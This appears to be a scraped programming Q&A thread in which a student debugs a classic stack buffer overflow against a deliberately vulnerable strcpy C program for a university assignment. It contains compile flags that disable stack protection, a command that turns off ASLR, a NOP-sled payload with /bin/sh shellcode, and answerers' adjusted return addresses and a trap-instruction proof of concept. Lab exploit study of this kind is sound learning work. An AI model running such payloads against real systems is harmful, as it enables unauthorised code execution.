I'm trying to do a Buffer Overflow attack on a simple C program that takes a buffer and print it. I've tried many combinations but at the end, when I try to execute my shellcode, I always get Segmentation Fault.
I've mainly followed this tutorial:
How to exploit a buffer overflow vulnerability - Practical
with the difference that I've tried compiling the program also in m64 because when I did it in m32 my memory addresses were all different, I've tried to explain my steps but if they are not clear you can just watch the video cause I've followed the same procedure.
The code I'm using to try my attack is
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buf[256];
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
I compile the code in this way:
gcc -o example -fno-stack-protector -m64 -z execstack example.c
I've also tried compiling it with m32 but as I said before, but my results after disassembling the main with gdb were completely different from the tutorial, on the other hand, when I compiled it with m64 they were very similar so it was easier to follow.
Once I compiled it and opened gdb I disassemble the main of the program and I look for the strcpy call. I select one of the addresses right after the strcpy call and I make a breakpoint right in that address.
After this I run the python code
run $(python -c "print('A'*256)")
And then I examine the content of the program after I ran this command, which prints 256 As. I examine it with the command
x/200xb $esp
I now can see the exact address in memory where my 'AAA..' sequence starts, I write it in a paper and then I run again my python code to understand with which value it goes in Segmentation Fault state.
Once I find the Seg Fault condition I simply run this:
run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd
\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xcf\xff\xff')")
where:
at this point, when I run the command the shellcode should be executed but it doesn't happen, it always says Segmentation Fault.
Of course I've also disabled aslr with the command
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Sorry if I've been messy with my explanation, I've tried like all the different possibilities but I never get the right result. (changing of course some flags, m64, m32 and playing a little bit with the values of the last command).
Thanks in advance, I really hope you'll help me because I need to figure this out for a University Assignemnt
I think that your mistake is at the return address:
run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xfc\xff\xbf')")
Instead of 0xffffcf94
(at m32) use 0xbffffc94
.
Maybe that's the mistake because the video you watched is really old and many things have changed until today
To test it, set a breakpoint at the return instruction in the main function and type info registers
to gdb to see what is the value of esp
(stack pointer)
If that is not the case, then maybe your shellcode is to old for ubuntu 20.04 or you use a x64 shellcode in a x86 executable
Try adding a \xcc
at the beginning of your shellcode to test if your shellcode is broken and that causes the SIGSEGV
signal
I also tried to develop a POC myself, and here it is:
run $(python -c 'print "\x90"*255 + "\xcc" + "aaaabbbbcccc" + "\x68\xfb\xff\xbf"')
where \x90 * 255
are 255 nop
instructions to make sure that we will land on the trap \xcc
. aaaabbbbcccc
is some junk that I used to reach the eip and 0xbffffb68
is a return address to the stack.
You need add "ret" gadget before the jump addr
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.